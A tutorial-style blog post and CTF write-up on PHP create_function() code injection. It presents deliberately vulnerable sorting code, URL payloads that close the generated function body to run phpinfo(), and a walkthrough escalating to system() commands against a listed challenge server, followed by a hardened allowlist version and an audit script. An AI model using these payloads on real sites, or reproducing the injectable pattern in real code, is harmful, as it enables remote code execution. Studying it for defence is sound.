create_function() code injection

0x00 create_function() function introduction

Scope: PHP 4 >= 4.0.1, PHP 5, PHP 7

Function: creates an anonymous function from the parameters passed and returns its unique name.

Syntax:

create_function ( string $args , string $code ) : string
// string $args: the parameter declaration of the generated function
// string $code: the body of the generated function, executed as PHP code

0x01 Function analysis

Example:

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

create_function() creates an anonymous function (lambda style).

create_function() runs its body through eval(): it wraps the two strings into the source text function __lambda_func($args){$code} and evaluates it, so the return statement seen in the example belongs to the second argument, string $code.

Thus the create_function() call above is equivalent to:

<?php
function lambda1($a,$b){
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>
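To make the eval() step concrete, the following is an added example rather than code from the original post: a minimal re-implementation that mirrors how create_function() assembles its source text and evaluates it. The helper name my_create_function() is an assumption; the real function evaluates the same kind of string and then renames the result to a unique internal name.

```php
<?php
// Added example, not code from the original post: a minimal re-implementation
// of what create_function() does internally, so the boundary between the
// generated wrapper and the caller-supplied $code is visible. The helper name
// my_create_function() is an assumption.
function my_create_function(string $args, string $code): string
{
    static $counter = 0;
    $name = 'lambda_' . (++$counter);

    // Everything between the braces is taken verbatim from $code. The whole
    // string is parsed as PHP, so $code is source text, not data: any "}" in
    // it ends the function body, and anything after it runs at top level.
    $source = 'function ' . $name . '(' . $args . ') {' . $code . '}';
    echo "evaluating: $source\n";
    eval($source);
    return $name;
}

$newfunc = my_create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo $newfunc(2, M_E), "\n";
```

Running it prints the assembled function declaration before the result, which is exactly the shape of the "actual implementation" listings in the injection cases below.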

0x03 Code injection cases

Case 1:

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];   // user-controlled value
$sorter = 'strnatcasecmp';
$databases = array('1234', '4321');
// $sort_by is concatenated straight into a string of PHP code ...
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
// ... which create_function() then compiles with eval()
usort($databases, create_function('$a, $b', $sort_function));
?>

Payload construction:

http://localhost/test/1.php?sort_by='"]);}phpinfo();/*

After substitution, the value of $sort_function is:

 return 1 * strnatcasecmp($a["'"]);}phpinfo();/*"], $b["'"]);}phpinfo();/*"]);

The function that create_function() actually compiles: the injected "}" closes the body early, phpinfo() runs at top level of the eval()'d code, and "/*" comments out the rest, including the wrapper's own closing brace:

function __lambda_func($a, $b){
 return 1 * strnatcasecmp($a["'"]);
}
phpinfo();
/*"], $b["'"]);}phpinfo();/*"]);}

Case 2:

<?php
$c = $_GET['c'];   // user-controlled value
// The first part is single-quoted so that $a and $b survive as literal text;
// $c is interpolated into the second part and lands inside the code string.
$lambda = create_function('$a,$b', 'return (strlen($a)-strlen($b)+' . "strlen($c));");
$array = array('reall long string here,boy', 'this', 'midding lenth', 'larget');
usort($array, $lambda);
print_r($array);
?>

Payload construction:

http://localhost/test/2.php?c=1));}phpinfo();/*

After substitution, the call becomes:

$lambda = create_function('$a,$b', 'return (strlen($a)-strlen($b)+strlen(1));}phpinfo();/*));');

The function that create_function() actually compiles:

function __lambda_func($a,$b){
    return (strlen($a)-strlen($b)+strlen(1));
}
phpinfo();
/*));}
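Both cases share one root cause: a request value is spliced into a string that is then compiled as PHP. The following hardened version of case 1 is an added example, not code from the original post: the sort key is checked against an allowlist of known column names and the comparison is an ordinary closure, so the user value is only ever used as data. The sample rows and the ALLOWED_SORT_KEYS list are constructed for the example.

```php
<?php
// Added example, not code from the original post: hardened form of case 1.
// No user-controlled text is ever compiled; the sort key is validated against
// an allowlist and the comparison is a closure that captures it as data.

// Constructed sample data: rows keyed by column name.
$databases = [
    ['name' => 'users',   'rows' => 1234],
    ['name' => 'orders',  'rows' => 4321],
    ['name' => 'archive', 'rows' => 77],
];

// Only these keys may be used for sorting; anything else is rejected.
const ALLOWED_SORT_KEYS = ['name', 'rows'];

function sort_rows(array $rows, string $sort_by, int $direction = 1): array
{
    if (!in_array($sort_by, ALLOWED_SORT_KEYS, true)) {
        throw new InvalidArgumentException('unknown sort key');
    }
    if ($direction !== 1 && $direction !== -1) {
        throw new InvalidArgumentException('direction must be 1 or -1');
    }
    // The closure captures $sort_by as a value; it never becomes part of a
    // code string, so there is nothing for a payload to break out of.
    usort($rows, function (array $a, array $b) use ($sort_by, $direction): int {
        return $direction * strnatcasecmp((string)$a[$sort_by], (string)$b[$sort_by]);
    });
    return $rows;
}

// Simulated request values (constructed): a legitimate key and the post's payload.
$requests = ['name', '\'"]);}phpinfo();/*'];
foreach ($requests as $sort_by) {
    try {
        $sorted = sort_rows($databases, $sort_by);
        echo "sorted by $sort_by: " . implode(', ', array_column($sorted, 'name')) . "\n";
    } catch (InvalidArgumentException $e) {
        // Reject and log the value; a rejected sort key is a useful signal to alert on.
        echo "rejected sort_by " . json_encode($sort_by) . ": " . $e->getMessage() . "\n";
    }
}
```

The allowlist is the important part: a regular expression on the key would also stop the payloads shown above, but an explicit list of column names is easier to review and does not need to anticipate every quoting trick.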

0x04 A CTF challenge with create_function() code injection

Address: http://198.13.45.199:5007/

The page has two links; clicking the "Don't click me" link leads to a page showing the PHP source: http://198.13.45.199:5007/index.php?source

The source uses create_function(), so there should be an injection point.

It takes a GET parameter named code; closing the statement with ";" should be enough to construct a working payload.

Payload construction:

http://198.13.45.199:5007/index.php?code=1;}phpinfo();/*

Code execution succeeded.

Use the system() function to run system commands:

Payload construction:

http://198.13.45.199:5007/index.php?code=1;}system(%27ls%20../../../%27);/*

Use ls to walk up the directory tree until the file containing the flag is found, then cat it to get the flag.

Starting with PHP 7.2.0, create_function() is deprecated.
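Because the function is deprecated and every call is a candidate for the pattern shown above, it is worth auditing a code base for it. The following script is an added example, not part of the original post: it uses PHP's own tokenizer (token_get_all) to list create_function() calls and flags those whose arguments are anything other than literal strings, which is exactly the situation in both cases above. The embedded sample source and the file-argument convention are assumptions.

```php
<?php
// Added example, not code from the original post: audit script that finds
// create_function() calls and reports which ones build their arguments
// dynamically (variables, concatenation, interpolation, nested calls).
// Assumed usage: php find_create_function.php [file.php]; with no argument
// it scans the constructed sample below.

function find_create_function_calls(string $source): array
{
    // Argument tokens that keep a call "literal": constant strings, whitespace, comments.
    $literal_only = [T_CONSTANT_ENCAPSED_STRING, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    $findings = [];
    $tokens = token_get_all($source);
    $n = count($tokens);

    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t) || $t[0] !== T_STRING || strcasecmp($t[1], 'create_function') !== 0) {
            continue;
        }
        $line = $t[2];
        $depth = 0;
        $args = [];
        $dynamic = false;

        // Walk to the matching ")" of the call, collecting the argument tokens.
        for ($j = $i + 1; $j < $n; $j++) {
            $u = $tokens[$j];
            if ($u === '(') {
                $depth++;
                if ($depth === 1) { continue; }          // opening paren of the call itself
            } elseif ($u === ')') {
                $depth--;
                if ($depth === 0) { break; }             // closing paren of the call
            }
            if ($depth < 1) { continue; }                // whitespace before the "("
            if (is_array($u)) {
                if (!in_array($u[0], $literal_only, true)) { $dynamic = true; }
                $args[] = $u[1];
            } else {
                if ($u !== ',') { $dynamic = true; }     // ".", nested parens, etc.
                $args[] = $u;
            }
        }
        $findings[] = ['line' => $line, 'dynamic' => $dynamic, 'args' => trim(implode('', $args))];
    }
    return $findings;
}

// Constructed sample input: the two vulnerable calls from the post and one literal call.
$sample = <<<'PHP'
<?php
usort($databases, create_function('$a, $b', $sort_function));
$lambda = create_function('$a,$b', 'return (strlen($a)-strlen($b)+' . "strlen($c));");
$safe = create_function('$a,$b', 'return $a + $b;');
PHP;

$source = $argc > 1 ? file_get_contents($argv[1]) : $sample;
foreach (find_create_function_calls($source) as $f) {
    printf("line %d: %-8s %s\n", $f['line'], $f['dynamic'] ? 'DYNAMIC' : 'literal', $f['args']);
}
```

On the sample, the first two calls are reported as DYNAMIC (a variable argument and a concatenated, interpolated string) and the third as literal. A literal call is still deprecated code that should become a closure, but a DYNAMIC one is the pattern to review first.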

Source: www.cnblogs.com/-chenxs/p/11459374.html